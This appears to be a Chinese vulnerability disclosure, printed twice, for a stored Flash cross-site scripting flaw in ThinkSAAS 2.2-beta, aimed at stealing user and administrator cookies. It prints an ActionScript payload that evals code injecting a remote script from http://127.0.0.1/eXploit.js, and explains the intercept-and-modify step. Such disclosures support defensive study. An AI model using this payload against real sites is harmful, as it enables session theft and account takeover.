VULHUB ™

### 简要描述： ThinkSAAS存在存储型跨站，可攻击任意用户或盲打管理员，盗取用户cookie等等 ### 详细说明： ThinkSAAS对文章内容过滤不严，导致存在存储型的Flash跨站。由于Flash文件可以执行任意脚本，利用此漏洞我们可以盗取任意用户(包括管理员)的cookie信息，或进行其它恶意攻击。 ### 漏洞证明： 1、涉及版本：thinksaas2.2-beta 2、登录系统，在文章模块发布文章，在内容处选择插入视频并输入flash文件路径。 [<img src="https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png) [<img src="https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png) 3、拦截请求，将<embed>标签的allowscriptaccess属性值改为always [<img src="https://images.seebug.org/upload/201411/271424512dce6c660db3854be749de662420b715.png" alt="2.png" width="600"...

### 简要描述： ThinkSAAS存在存储型跨站，可攻击任意用户或盲打管理员，盗取用户cookie等等 ### 详细说明： ThinkSAAS对文章内容过滤不严，导致存在存储型的Flash跨站。由于Flash文件可以执行任意脚本，利用此漏洞我们可以盗取任意用户(包括管理员)的cookie信息，或进行其它恶意攻击。 ### 漏洞证明： 1、涉及版本：thinksaas2.2-beta 2、登录系统，在文章模块发布文章，在内容处选择插入视频并输入flash文件路径。 [<img src="https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142320ba7029b512ad0fa12e09f074d1fef2ba.png) [<img src="https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/271423344681e24e344edc4331c346fe3ac34324.png) 3、拦截请求，将<embed>标签的allowscriptaccess属性值改为always [<img src="https://images.seebug.org/upload/201411/271424512dce6c660db3854be749de662420b715.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/271424512dce6c660db3854be749de662420b715.png) 4、其它用户登录系统，查看文章时，漏洞触发： [<img src="https://images.seebug.org/upload/201411/27142531573f2bbf8f5a208f4c4c93cc4d90bace.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142531573f2bbf8f5a208f4c4c93cc4d90bace.png) 5、使用Firebug查看页面源文件,allowscriptaccess属性值为always，可以执行任意脚本文件。 [<img src="https://images.seebug.org/upload/201411/2714264965fbd519eb7ee5ecb4eb32fdf801d564.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2714264965fbd519eb7ee5ecb4eb32fdf801d564.png) 6、修改flash文件的内容为：import flash.external.ExternalInterface; ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);"); 漏洞执行时，可成功加载本地脚本文件。 [<img src="https://images.seebug.org/upload/201411/27142925df24e651c6df9d0bf5846d23a8c91fc9.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/27142925df24e651c6df9d0bf5846d23a8c91fc9.png) 修改脚本文件利用代码可进行针对性的攻击。 7、管理员查看文章时，漏洞触发，可以盗取管理员cookie [<img src="https://images.seebug.org/upload/201411/2714302068326aeabc8c8a852d2f9f78bc2fb16f.png" alt="7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2714302068326aeabc8c8a852d2f9f78bc2fb16f.png)